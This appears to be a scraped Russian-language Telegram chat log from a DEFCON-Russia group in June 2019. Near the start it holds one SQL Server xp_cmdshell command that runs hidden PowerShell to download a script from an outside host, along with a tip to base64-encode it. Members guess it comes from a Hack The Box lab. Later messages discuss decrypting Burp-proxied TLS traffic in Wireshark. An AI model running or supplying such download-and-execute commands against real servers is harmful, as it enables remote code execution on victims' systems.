Size: a a a

DCG#7812 DEFCON-RUSSIA

2019 June 10

D

Danila in DCG#7812 DEFCON-RUSSIA
exec xp_cmdshell "powershell -noprofile -w hidden -c 'iex ((new-object net.WebClient).DownloadFile("http://10.10.14.106:8000/in.ps1"))'";
источник

D

Danila in DCG#7812 DEFCON-RUSSIA
alxchk
-enc
Ja ja,+ b64 encode
источник

a

alxchk in DCG#7812 DEFCON-RUSSIA
powershell создан специально для малвары
источник

D

Danila in DCG#7812 DEFCON-RUSSIA
alxchk
powershell создан специально для малвары
По подвальным проектам анб
источник

a

alxchk in DCG#7812 DEFCON-RUSSIA
а xp_cmdshell еще в реальной жизни бывает?
источник

PI

PaHUEllo IbanuZZo in DCG#7812 DEFCON-RUSSIA
alxchk
а xp_cmdshell еще в реальной жизни бывает?
д
источник

PI

PaHUEllo IbanuZZo in DCG#7812 DEFCON-RUSSIA
судя по айпишнику, это хтб)
источник

PI

PaHUEllo IbanuZZo in DCG#7812 DEFCON-RUSSIA
заверни в б64
источник

D

Danila in DCG#7812 DEFCON-RUSSIA
alxchk
а xp_cmdshell еще в реальной жизни бывает?
Д
источник

D

Danila in DCG#7812 DEFCON-RUSSIA
В банках бывает все)
источник
2019 June 12

S

Slava in DCG#7812 DEFCON-RUSSIA
источник

GD

Green Dog in DCG#7812 DEFCON-RUSSIA
ого
источник

A

Anatol in DCG#7812 DEFCON-RUSSIA
Green Dog
ого
ага
источник

e

e13fter in DCG#7812 DEFCON-RUSSIA
всем привет! когда проксируешь HTTPS через burp, как-нибудь можно получить сессионный ключ TLS, чтоб скормить его уже в wireshark?
источник

R

Rustam in DCG#7812 DEFCON-RUSSIA
а приватный ключ берпа в wireshark не импортнуть?
источник

e

e13fter in DCG#7812 DEFCON-RUSSIA
а где его взять?
источник
2019 June 13

K

Konstantin in DCG#7812 DEFCON-RUSSIA
Сгенерировать selfsigned сертификат через openssl, а затем скормить его берпу, а ключ от него,соответственно шарку. Но тут есть нюанс: В берпе надо будет отключить в настройках ssl все edhe-шифры (т.к. в них шифрование ведётся на основе diffie-hellman)
источник

e

e13fter in DCG#7812 DEFCON-RUSSIA
Спасибо!
источник

e

e13fter in DCG#7812 DEFCON-RUSSIA
Попробую
источник

S

Sergio in DCG#7812 DEFCON-RUSSIA
👍
источник